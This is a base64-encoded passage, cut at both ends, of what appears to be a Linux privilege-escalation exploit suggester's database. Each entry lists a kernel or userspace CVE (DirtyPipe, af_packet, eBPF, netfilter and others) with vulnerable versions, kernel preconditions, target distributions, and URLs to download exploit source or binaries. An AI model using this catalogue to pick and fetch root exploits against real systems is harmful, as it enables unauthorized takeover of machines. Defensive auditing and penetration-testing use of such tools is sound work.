nVsbmVyYWJpbGl0eURldGFpbHMKZXh0LXVybDogaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZG93bmxvYWQvNDA4NDcKQ29tbWVudHM6IEZvciBSSEVML0NlbnRPUyBzZWUgZXhhY3QgdnVsbmVyYWJsZSB2ZXJzaW9ucyBoZXJlOiBodHRwczovL2FjY2Vzcy5yZWRoYXQuY29tL3NpdGVzL2RlZmF1bHQvZmlsZXMvcmgtY3ZlLTIwMTYtNTE5NV81LnNoCmV4cGxvaXQtZGI6IDQwODM5CmF1dGhvcjogRmlyZUZhcnQgKGF1dGhvciBvZiBleHBsb2l0IGF0IEVEQiA0MDgzOSk7IEdhYnJpZWxlIEJvbmFjaW5pIChhdXRob3Igb2YgZXhwbG9pdCBhdCAnZXh0LXVybCcpCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtODY1NV0ke3R4dHJzdH0gY2hvY29ib19yb290ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj00LjQuMCx2ZXI8NC45LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xClRhZ3M6IHVidW50dT0oMTQuMDR8MTYuMDQpe2tlcm5lbDo0LjQuMC0oMjF8MjJ8MjR8Mjh8MzF8MzR8MzZ8Mzh8NDJ8NDN8NDV8NDd8NTEpLWdlbmVyaWN9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNi8xMi8wNi8xCkNvbW1lbnRzOiBDQVBfTkVUX1JBVyBjYXBhYmlsaXR5IGlzIG5lZWRlZCBPUiBDT05GSUdfVVNFUl9OUz15IG5lZWRzIHRvIGJlIGVuYWJsZWQKYmluLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3JhcGlkNy9tZXRhc3Bsb2l0LWZyYW1ld29yay9tYXN0ZXIvZGF0YS9leHBsb2l0cy9DVkUtMjAxNi04NjU1L2Nob2NvYm9fcm9vdApleHBsb2l0LWRiOiA0MDg3MQphdXRob3I6IHJlYmVsCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtOTc5M10ke3R4dHJzdH0gU09fe1NORHxSQ1Z9QlVGRk9SQ0UKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuMTEsdmVyPDQuOC4xNCxDT05GSUdfVVNFUl9OUz15LHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX3VzZXJuc19jbG9uZT09MQpUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL3hhaXJ5L2tlcm5lbC1leHBsb2l0cy90cmVlL21hc3Rlci9DVkUtMjAxNi05NzkzCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS94YWlyeS9rZXJuZWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE2LTk3OTMvcG9jLmMKQ29tbWVudHM6IENBUF9ORVRfQURNSU4gY2FwcyBPUiBDT05GSUdfVVNFUl9OUz15IG5lZWRlZC4gTm8gU01FUC9TTUFQL0tBU0xSIGJ5cGFzcyBpbmNsdWRlZC4gVGVzdGVkIGluIFFFTVUgb25seQpleHBsb2l0LWRiOiA0MTk5NQphdXRob3I6IEFuZHJleSAneGFpcnknIEtvbm92YWxvdgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE3LTYwNzRdJHt0eHRyc3R9IGRjY3AKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xOCx2ZXI8PTQuOS4xMSxDT05GSUdfSVBfRENDUD1bbXldClRhZ3M6IHVidW50dT0oMTQuMDR8MTYuMDQpe2tlcm5lbDo0LjQuMC02Mi1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTcvMDIvMjIvMwpDb21tZW50czogUmVxdWlyZXMgS2VybmVsIGJlIGJ1aWx0IHdpdGggQ09ORklHX0lQX0RDQ1AgZW5hYmxlZC4gSW5jbHVkZXMgcGFydGlhbCBTTUVQL1NNQVAgYnlwYXNzCmV4cGxvaXQtZGI6IDQxNDU4CmF1dGhvcjogQW5kcmV5ICd4YWlyeScgS29ub3ZhbG92CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNzMwOF0ke3R4dHJzdH0gYWZfcGFja2V0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjIsdmVyPD00LjEwLjYsQ09ORklHX1VTRVJfTlM9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9PTEKVGFnczogdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjguMC0oMzR8MzZ8Mzl8NDF8NDJ8NDR8NDUpLWdlbmVyaWN9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2dvb2dsZXByb2plY3R6ZXJvLmJsb2dzcG90LmNvbS8yMDE3LzA1L2V4cGxvaXRpbmctbGludXgta2VybmVsLXZpYS1wYWNrZXQuaHRtbApzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy03MzA4L3BvYy5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy03MzA4L3BvYy5jCkNvbW1lbnRzOiBDQVBfTkVUX1JBVyBjYXAgb3IgQ09ORklHX1VTRVJfTlM9eSBuZWVkZWQuIE1vZGlmaWVkIHZlcnNpb24gYXQgJ2V4dC11cmwnIGFkZHMgc3VwcG9ydCBmb3IgYWRkaXRpb25hbCBrZXJuZWxzCmJpbi11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yYXBpZDcvbWV0YXNwbG9pdC1mcmFtZXdvcmsvbWFzdGVyL2RhdGEvZXhwbG9pdHMvY3ZlLTIwMTctNzMwOC9leHBsb2l0CmV4cGxvaXQtZGI6IDQxOTk0CmF1dGhvcjogQW5kcmV5ICd4YWlyeScgS29ub3ZhbG92IChvcmdpbmFsIGV4cGxvaXQgYXV0aG9yKTsgQnJlbmRhbiBDb2xlcyAoYXV0aG9yIG9mIGV4cGxvaXQgdXBkYXRlIGF0ICdleHQtdXJsJykKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xNjk5NV0ke3R4dHJzdH0gZUJQRl92ZXJpZmllcgpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LHZlcjw9NC4xNC44LENPTkZJR19CUEZfU1lTQ0FMTD15LHN5c2N0bDprZXJuZWwudW5wcml2aWxlZ2VkX2JwZl9kaXNhYmxlZCE9MQpUYWdzOiBkZWJpYW49OS4we2tlcm5lbDo0LjkuMC0zLWFtZDY0fSxmZWRvcmE9MjV8MjZ8MjcsdWJ1bnR1PTE0LjA0e2tlcm5lbDo0LjQuMC04OS1nZW5lcmljfSx1YnVudHU9KDE2LjA0fDE3LjA0KXtrZXJuZWw6NC4oOHwxMCkuMC0oMTl8Mjh8NDUpLWdlbmVyaWN9ClJhbms6IDUKYW5hbHlzaXMtdXJsOiBodHRwczovL3JpY2tsYXJhYmVlLmJsb2dzcG90LmNvbS8yMDE4LzA3L2VicGYtYW5kLWFuYWx5c2lzLW9mLWdldC1yZWt0LWxpbnV4Lmh0bWwKQ29tbWVudHM6IENPTkZJR19CUEZfU1lTQ0FMTCBuZWVkcyB0byBiZSBzZXQgJiYga2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQgIT0gMQpiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE3LTE2OTk1L2V4cGxvaXQub3V0CmV4cGxvaXQtZGI6IDQ1MDEwCmF1dGhvcjogUmljayBMYXJhYmVlCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDExMl0ke3R4dHJzdH0gTkVUSUZfRl9VRk8KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8PTQuMTMsQ09ORklHX1VTRVJfTlM9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9PTEKVGFnczogdWJ1bnR1PTE0LjA0e2tlcm5lbDo0LjQuMC0qfSx1YnVudHU9MTYuMDR7a2VybmVsOjQuOC4wLSp9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNy8wOC8xMy8xCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS94YWlyeS9rZXJuZWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE3LTEwMDAxMTIvcG9jLmMKZXh0LXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jjb2xlcy9rZXJuZWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE3LTEwMDAxMTIvcG9jLmMKQ29tbWVudHM6IENBUF9ORVRfQURNSU4gY2FwIG9yIENPTkZJR19VU0VSX05TPXkgbmVlZGVkLiBTTUVQL0tBU0xSIGJ5cGFzcyBpbmNsdWRlZC4gTW9kaWZpZWQgdmVyc2lvbiBhdCAnZXh0LXVybCcgYWRkcyBzdXBwb3J0IGZvciBhZGRpdGlvbmFsIGRpc3Ryb3Mva2VybmVscwpiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE3LTEwMDAxMTIvZXhwbG9pdC5vdXQKZXhwbG9pdC1kYjoKYXV0aG9yOiBBbmRyZXkgJ3hhaXJ5JyBLb25vdmFsb3YgKG9yZ2luYWwgZXhwbG9pdCBhdXRob3IpOyBCcmVuZGFuIENvbGVzIChhdXRob3Igb2YgZXhwbG9pdCB1cGRhdGUgYXQgJ2V4dC11cmwnKQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE3LTEwMDAyNTNdJHt0eHRyc3R9IFBJRV9zdGFja19jb3JydXB0aW9uClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjIsdmVyPD00LjEzLHg4Nl82NApUYWdzOiBSSEVMPTYsUkhFTD03e2tlcm5lbDozLjEwLjAtNTE0LjIxLjJ8My4xMC4wLTUxNC4yNi4xfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA5LzI2L2xpbnV4LXBpZS1jdmUtMjAxNy0xMDAwMjUzL2N2ZS0yMDE3LTEwMDAyNTMudHh0CnNyYy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wOS8yNi9saW51eC1waWUtY3ZlLTIwMTctMTAwMDI1My9jdmUtMjAxNy0xMDAwMjUzLmMKZXhwbG9pdC1kYjogNDI4ODcKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTgtNTMzM10ke3R4dHJzdH0gcmRzX2F0b21pY19mcmVlX29wIE5VTEwgcG9pbnRlciBkZXJlZmVyZW5jZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LHZlcjw9NC4xNC4xMyxjbWQ6Z3JlcCAtcWkgcmRzIC9wcm9jL21vZHVsZXMseDg2XzY0ClRhZ3M6IHVidW50dT0xNi4wNHtrZXJuZWw6NC40LjB8NC44LjB9ClJhbms6IDEKc3JjLXVybDogaHR0cHM6Ly9naXN0LmdpdGh1YnVzZXJjb250ZW50LmNvbS93Ym93bGluZy85ZDMyNDkyYmQ5NmQ5ZTdjM2JmNTJlMjNhMGFjMzBhNC9yYXcvOTU5MzI1ODE5Yzc4MjQ4YTY0MzcxMDJiYjI4OWJiODU3OGExMzVjZC9jdmUtMjAxOC01MzMzLXBvYy5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxOC01MzMzL2N2ZS0yMDE4LTUzMzMuYwpDb21tZW50czogcmRzLmtvIGtlcm5lbCBtb2R1bGUgbmVlZHMgdG8gYmUgbG9hZGVkLiBNb2RpZmllZCB2ZXJzaW9uIGF0ICdleHQtdXJsJyBhZGRzIHN1cHBvcnQgZm9yIGFkZGl0aW9uYWwgdGFyZ2V0cyBhbmQgYnlwYXNzaW5nIEtBU0xSLgphdXRob3I6IHdib3dsaW5nIChvcmdpbmFsIGV4cGxvaXQgYXV0aG9yKTsgYmNvbGVzIChhdXRob3Igb2YgZXhwbG9pdCB1cGRhdGUgYXQgJ2V4dC11cmwnKQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE4LTE4OTU1XSR7dHh0cnN0fSBzdWJ1aWRfc2hlbGwKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuMTUsdmVyPD00LjE5LjIsQ09ORklHX1VTRVJfTlM9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9PTEsY21kOlsgLXUgL3Vzci9iaW4vbmV3dWlkbWFwIF0sY21kOlsgLXUgL3Vzci9iaW4vbmV3Z2lkbWFwIF0KVGFnczogdWJ1bnR1PTE4LjA0e2tlcm5lbDo0LjE1LjAtMjAtZ2VuZXJpY30sZmVkb3JhPTI4e2tlcm5lbDo0LjE2LjMtMzAxLmZjMjh9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2J1Z3MuY2hyb21pdW0ub3JnL3AvcHJvamVjdC16ZXJvL2lzc3Vlcy9kZXRhaWw/aWQ9MTcxMgpzcmMtdXJsOiBodHRwczovL2dpdGxhYi5jb20vZXhwbG9pdC1kYXRhYmFzZS9leHBsb2l0ZGItYmluLXNwbG9pdHMvLS9yYXcvbWFpbi9iaW4tc3Bsb2l0cy80NTg4Ni56aXAKZXhwbG9pdC1kYjogNDU4ODYKYXV0aG9yOiBKYW5uIEhvcm4KQ29tbWVudHM6IENPTkZJR19VU0VSX05TIG5lZWRzIHRvIGJlIGVuYWJsZWQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xMzI3Ml0ke3R4dHJzdH0gUFRSQUNFX1RSQUNFTUUKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQsdmVyPDUuMS4xNyxzeXNjdGw6a2VybmVsLnlhbWEucHRyYWNlX3Njb3BlPT0wLHg4Nl82NApUYWdzOiB1YnVudHU9MTYuMDR7a2VybmVsOjQuMTUuMC0qfSx1YnVudHU9MTguMDR7a2VybmVsOjQuMTUuMC0qfSxkZWJpYW49OXtrZXJuZWw6NC45LjAtKn0sZGViaWFuPTEwe2tlcm5lbDo0LjE5LjAtKn0sZmVkb3JhPTMwe2tlcm5lbDo1LjAuOS0qfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9idWdzLmNocm9taXVtLm9yZy9wL3Byb2plY3QtemVyby9pc3N1ZXMvZGV0YWlsP2lkPTE5MDMKc3JjLXVybDogaHR0cHM6Ly9naXRsYWIuY29tL2V4cGxvaXQtZGF0YWJhc2UvZXhwbG9pdGRiLWJpbi1zcGxvaXRzLy0vcmF3L21haW4vYmluLXNwbG9pdHMvNDcxMzMuemlwCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxOS0xMzI3Mi9wb2MuYwpDb21tZW50czogUmVxdWlyZXMgYW4gYWN0aXZlIFBvbEtpdCBhZ2VudC4KZXhwbG9pdC1kYjogNDcxMzMKZXhwbG9pdC1kYjogNDcxNjMKYXV0aG9yOiBKYW5uIEhvcm4gKG9yZ2luYWwgZXhwbG9pdCBhdXRob3IpOyBiY29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTU2NjZdJHt0eHRyc3R9IFhGUk1fVUFGClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLHZlcjw1LjAuMTksQ09ORklHX1VTRVJfTlM9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9PTEsQ09ORklHX1hGUk09eQpUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9kdWFzeW50LmNvbS9ibG9nL3VidW50dS1jZW50b3MtcmVkaGF0LXByaXZlc2MKYmluLXVybDogaHR0cHM6Ly9naXRodWIuY29tL2R1YXN5bnQveGZybV9wb2MvcmF3L21hc3Rlci9sdWNreTAKQ29tbWVudHM6IENPTkZJR19VU0VSX05TIG5lZWRzIHRvIGJlIGVuYWJsZWQ7IENPTkZJR19YRlJNIG5lZWRzIHRvIGJlIGVuYWJsZWQKYXV0aG9yOiBWaXRhbHkgJ3ZuaWsnIE5pa29sZW5rbwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTI3MzY1XSR7dHh0cnN0fSBsaW51eC1pc2NzaQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcjw9NS4xMS4zLENPTkZJR19TTEFCX0ZSRUVMSVNUX0hBUkRFTkVEIT15ClRhZ3M6IFJIRUw9OApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9ibG9nLmdyaW1tLWNvLmNvbS8yMDIxLzAzL25ldy1vbGQtYnVncy1pbi1saW51eC1rZXJuZWwuaHRtbApzcmMtdXJsOiBodHRwczovL2NvZGVsb2FkLmdpdGh1Yi5jb20vZ3JpbW0tY28vTm90UXVpdGUwRGF5RnJpZGF5L3ppcC90cnVuawpDb21tZW50czogQ09ORklHX1NMQUJfRlJFRUxJU1RfSEFSREVORUQgbXVzdCBub3QgYmUgZW5hYmxlZAphdXRob3I6IEdSSU1NCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMjEtMzQ5MF0ke3R4dHJzdH0gZUJQRiBBTFUzMiBib3VuZHMgdHJhY2tpbmcgZm9yIGJpdHdpc2Ugb3BzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj01LjcsdmVyPDUuMTIsQ09ORklHX0JQRl9TWVNDQUxMPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkIT0xClRhZ3M6IHVidW50dT0yMC4wNHtrZXJuZWw6NS44LjAtKDI1fDI2fDI3fDI4fDI5fDMwfDMxfDMyfDMzfDM0fDM1fDM2fDM3fDM4fDM5fDQwfDQxfDQyfDQzfDQ0fDQ1fDQ2fDQ3fDQ4fDQ5fDUwfDUxfDUyKS0qfSx1YnVudHU9MjEuMDR7a2VybmVsOjUuMTEuMC0xNi0qfQpSYW5rOiA1CmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuZ3JhcGxzZWN1cml0eS5jb20vcG9zdC9rZXJuZWwtcHduaW5nLXdpdGgtZWJwZi1hLWxvdmUtc3RvcnkKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL2Nob21waWUxMzM3L0xpbnV4X0xQRV9lQlBGX0NWRS0yMDIxLTM0OTAvemlwL21haW4KQ29tbWVudHM6IENPTkZJR19CUEZfU1lTQ0FMTCBuZWVkcyB0byBiZSBzZXQgJiYga2VybmVsLnVucHJpdmlsZWdlZF9icGZfZGlzYWJsZWQgIT0gMQphdXRob3I6IGNob21waWUxMzM3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMjEtMjI1NTVdJHt0eHRyc3R9IE5ldGZpbHRlciBoZWFwIG91dC1vZi1ib3VuZHMgd3JpdGUKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4xOSx2ZXI8PTUuMTItcmM2ClRhZ3M6IHVidW50dT0yMC4wNHtrZXJuZWw6NS44LjAtKn0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ29vZ2xlLmdpdGh1Yi5pby9zZWN1cml0eS1yZXNlYXJjaC9wb2NzL2xpbnV4L2N2ZS0yMDIxLTIyNTU1L3dyaXRldXAuaHRtbApzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vZ29vZ2xlL3NlY3VyaXR5LXJlc2VhcmNoL21hc3Rlci9wb2NzL2xpbnV4L2N2ZS0yMDIxLTIyNTU1L2V4cGxvaXQuYwpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2tlcm5lbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMjEtMjI1NTUvZXhwbG9pdC5jCkNvbW1lbnRzOiBpcF90YWJsZXMga2VybmVsIG1vZHVsZSBtdXN0IGJlIGxvYWRlZApleHBsb2l0LWRiOiA1MDEzNQphdXRob3I6IHRoZWZsb3cgKG9yZ2luYWwgZXhwbG9pdCBhdXRob3IpOyBiY29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMjItMDg0N10ke3R4dHJzdH0gRGlydHlQaXBlClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj01LjgsdmVyPD01LjE2LjExClRhZ3M6IHVidW50dT0oMjAuMDR8MjEuMDQpLGRlYmlhbj0xMQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9kaXJ0eXBpcGUuY200YWxsLmNvbS8Kc3JjLXVybDogaHR0cHM6Ly9oYXh4LmluL2ZpbGVzL2RpcnR5cGlwZXouYwpleHBsb2l0LWRiOiA1MDgwOAphdXRob3I6IGJsYXN0eSAob3JpZ2luYWwgZXhwbG9pdCBhdXRob3I6IE1heCBLZWxsZXJtYW5uKQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIyLTI1ODZdJHt0eHRyc3R9IG5mdF9vYmplY3QgVUFGClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjE2LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xClRhZ3M6IHVidW50dT0oMjAuMDQpe2tlcm5lbDo1LjEyLjEzfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDIyLzA4LzI5LzUKc3JjLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDIyLzA4LzI5LzUvMQpDb21tZW50czoga2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9MSByZXF1aXJlZCAodG8gb2J0YWluIENBUF9ORVRfQURNSU4pCmF1dGhvcjogdnVsbmVyYWJpbGl0eSBkaXNjb3Zlcnk6IFRlYW0gT3JjYSBvZiBTZWEgU2VjdXJpdHk7IEV4cGxvaXQgYXV0aG9yOiBBbGVqYW5kcm8gR3VlcnJlcm8KRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMi0zMjI1MF0ke3R4dHJzdH0gbmZ0X29iamVjdCBVQUYgKE5GVF9NU0dfTkVXU0VUKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcjw1LjE4LjEsQ09ORklHX1VTRVJfTlM9eSxzeXNjdGw6a2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9PTEKVGFnczogdWJ1bnR1PSgyMi4wNCl7a2VybmVsOjUuMTUuMC0yNy1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9yZXNlYXJjaC5uY2Nncm91cC5jb20vMjAyMi8wOS8wMS9zZXR0bGVycy1vZi1uZXRsaW5rLWV4cGxvaXRpbmctYS1saW1pdGVkLXVhZi1pbi1uZl90YWJsZXMtY3ZlLTIwMjItMzIyNTAvCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9ibG9nLnRoZW9yaS5pby9yZXNlYXJjaC9DVkUtMjAyMi0zMjI1MC1saW51eC1rZXJuZWwtbHBlLTIwMjIvCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS90aGVvcmktaW8vQ1ZFLTIwMjItMzIyNTAtZXhwbG9pdC9tYWluL2V4cC5jCkNvbW1lbnRzOiBrZXJuZWwudW5wcml2aWxlZ2VkX3VzZXJuc19jbG9uZT0xIHJlcXVpcmVkICh0byBvYnRhaW4gQ0FQX05FVF9BRE1JTikKYXV0aG9yOiB2dWxuZXJhYmlsaXR5IGRpc2NvdmVyeTogRURHIFRlYW0gZnJvbSBOQ0MgR3JvdXA7IEF1dGhvciBvZiB0aGlzIGV4cGxvaXQ6IHRoZW9yaS5pbwpFT0YKKQoKCiMjIyMjIyMjIyMjIyBVU0VSU1BBQ0UgRVhQTE9JVFMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCm49MAoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwNC0wMTg2XSR7dHh0cnN0fSBzYW1iYQpSZXFzOiBwa2c9c2FtYmEsdmVyPD0yLjIuOApUYWdzOiAKUmFuazogMQpleHBsb2l0LWRiOiAyMzY3NApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAwOS0xMTg1XSR7dHh0cnN0fSB1ZGV2ClJlcXM6IHBrZz11ZGV2LHZlcjwxNDEsY21kOltbIC1mIC9ldGMvdWRldi9ydWxlcy5kLzk1LXVkZXYtbGF0ZS5ydWxlcyB8fCAtZiAvbGliL3VkZXYvcnVsZXMuZC85NS11ZGV2LWxhdGUucnVsZXMgXV0KVGFnczogdWJ1bnR1PTguMTB8OS4wNApSYW5rOiAxCmV4cGxvaXQtZGI6IDg1NzIKQ29tbWVudHM6IFZlcnNpb248MS40LjEgdnVsbmVyYWJsZSBidXQgZGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZCAKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMDktMTE4NV0ke3R4dHJzdH0gdWRldiAyClJlcXM6IHBrZz11ZGV2LHZlcjwxNDEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA4NDc4CkNvbW1lbnRzOiBTU0ggYWNjZXNzIHRvIG5vbiBwcml2aWxlZ2VkIHVzZXIgaXMgbmVlZGVkLiBWZXJzaW9uPDEuNC4xIHZ1bG5lcmFibGUgYnV0IGRpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMDgzMl0ke3R4dHJzdH